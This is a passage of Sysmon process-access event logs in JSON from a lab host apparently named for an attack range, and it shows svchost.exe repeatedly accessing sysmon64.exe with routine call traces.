05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1393,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1394,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1395,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1396,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1397,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1398,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1399,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1400,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 